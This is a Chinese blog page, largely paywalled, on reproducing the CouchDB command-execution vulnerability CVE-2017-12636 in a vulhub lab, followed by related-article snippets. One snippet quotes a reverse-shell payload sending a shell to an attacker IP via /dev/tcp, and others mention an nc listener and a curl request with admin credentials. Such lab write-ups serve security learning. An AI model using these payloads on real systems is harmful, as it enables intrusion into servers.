Couchdb 任意命令执行漏洞(CVE-2017-12636)复现

最新推荐文章于 2024-04-16 20:25:44 发布
原创 最新推荐文章于 2024-04-16 20:25:44 发布 · 3.5k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文介绍了Apache CouchDB的CVE-2017-12636漏洞,这是一个允许任意命令执行的安全问题。文章详细阐述了受影响的版本,环境搭建步骤,以及漏洞复现过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

简介

 

Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。

 

影响版本

 

小于 1.7.0 以及 小于 2.1.1

 

 

环境搭建

 

https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12636

执行如下命令启动Couchdb 1.6.0环境:

docker-compose up -d

最低0.47元/天 解锁文章

200万优质内容无限畅学
13 - vulhub - Couchdb 任意命令执行漏洞CVE-2017-12636(1)
2401_83817171的博客
04-12 751
漏洞复现Couchdb 2.x和1.x的API接口有一定的区别,所以这个漏洞的利用方式也不同。本环境启动是1.6.0版本,如果你想测试2.1.0版本,可以启动CVE-2017- 12635附带的环境。靶机环境 139.196.87.102 (vulhub)攻击机环境 192.168.8.137 (虚拟机 Ubuntu 20、Java1.8、Burp)启动 Couchdb 垂直权限绕过漏洞 环境1.进入 vulhub 的 Couchdb 任意命令执行漏洞 路径cd /usr/local/tools/
CouchDB 漏洞复现 CVE-2017-12635/12636
sechelper的博客
02-11 464
CouchDBCVE-2017-12635和12636联合利用,详细漏洞复现,exp下载获取
13 - vulhub - Couchdb 任意命令执行漏洞CVE-2017-12636
易编橙 · 终身成长社群,相遇已是上上签!
10-22 850
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12636是一个任意命令执行漏洞
Couchdb 任意命令执行漏洞CVE-2017-12636
时光凉春衫薄的博客
12-07 2035
产品样子 该漏洞是需要登录用户方可触发,如果不知道目标管理员密码,可以利用CVE-2017-12635先增加一个管理员用户。 首先通过(CVE-2017-12635)漏洞创建一个用户qwe 密码也是qwe 1.6.0 下的说明 依次执行如下请求即可触发任意命令执行: 查看命令执行的结果 按照 vulhub中提示的环境来看这些命令也可以通过curl命令进行 其中,`vulhub:vulhub`为管理员账号密码。 curl -X PUT 'ht...
【vulhub】Couchdb 任意命令执行漏洞CVE-2017-12636
qq_45300786的博客
09-14 951
特征 特征请参考我的上一篇帖子 【vulhub】Couchdb 垂直权限绕过漏洞CVE-2017-12635)漏洞复现 影响版本:小于 1.7.0 以及 小于 2.1.1 复现 注:复现中的很多东西也要用到这篇帖子,所以先看这篇 【vulhub】Couchdb 垂直权限绕过漏洞CVE-2017-12635)漏洞复现 再来看本篇帖子 该漏洞是需要登录用户方可触发,如果不知道目标管理员密码,可以利用CVE-2017-12635先增加一个管理员用户。 本次复现是用的版本1.6 http://192.168.1
Couchdb_任意命令执行漏洞 CVE-2017-12636 漏洞复现
ADummy的博客
02-22 410
Couchdb 垂直权限绕过漏洞 by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>用户创建成功—>成功登录 0x01漏洞介绍 CouchDB 是一个开源的面向文档的数据库管理系统,可以通过 RESTful JavaScript Object Notation (JSON) API 访问。CouchDB会默认会在5984端口开放Restful的API接口,用于数据库的管理功能。 那么,问题出在哪呢?翻阅官方描述会发现,CouchDB中有一个Query_Server的配置
Couchdb数据库-命令执行漏洞复现-CVE-2017-12636
apple_52661176的博客
08-31 321
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。0>&1""" #攻击机ip。开启vulfocus靶场环境。在攻击机上开启nc监听。
Couchdb 任意命令执行漏洞(CVE-2017-12636)
weixin_46239998的博客
01-01 874
command = rb"""sh -i >& /dev/tcp/192.168.217.128/5566 0>&1""" # 这里的ip为监听机ip也就是攻击机。target = 'http://192.168.217.128:5984' # 目标ip。如上图所示即反弹shell成功!三、构造payload。
couchdb 任意命令执行漏洞 cve-2017-12636
whatday的专栏
01-30 379
Couchdb简介: Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 漏洞简介: CouchDB 是一个开源的面向文档的数据库管理系统,可以通过 RESTful JavaScript Obj
利用Vulnhub复现漏洞 - Couchdb 任意命令执行漏洞CVE-2017-12636
07-17 455
漏洞原理:Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15...
Apache couchdb 命令执行CVE-2017-12636复现
YouthBelief的博客
11-04 880
couchdb 命令执行CVE-2017-12636couchdb 命令执行CVE-2017-12636)0x01 漏洞描述0x02 影响范围0x03 漏洞复现工具复现0x04 漏洞修复 couchdb 命令执行CVE-2017-12636) Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展
CouchDB 未授权访问漏洞总结
qq_45746681的博客
10-05 1414
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、CouchDB 未授权访问漏洞是什么?二、复现1.搭建环境2.漏洞反弹shell的exp防御方法 前言 复现常见的未授权访问漏洞 加强理解 一、CouchDB 未授权访问漏洞是什么? Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其
Couchdb 命令执行漏洞复现CVE-2017-12636
XXokok的博客
11-25 382
Couchdb 命令执行漏洞复现CVE-2017-12636
CouchDB漏洞复现
weixin_44259979的博客
10-07 886
CouchDB漏洞复现
13 - vulhub - Couchdb 任意命令执行漏洞CVE-2024-12636
最新发布
04-16 980
这是我花了几天的时间去把Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。基本上主流的和经典的都有,这里我就不放图了,版权问题,个人看看是没有问题的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值